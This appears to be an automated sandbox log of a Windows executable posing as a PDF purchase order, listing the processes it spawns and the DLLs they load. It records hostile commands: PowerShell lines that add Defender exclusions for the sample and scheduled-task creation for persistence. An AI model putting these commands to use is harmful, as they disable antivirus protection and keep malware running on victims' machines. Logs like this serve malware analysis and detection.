                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptsp.dll
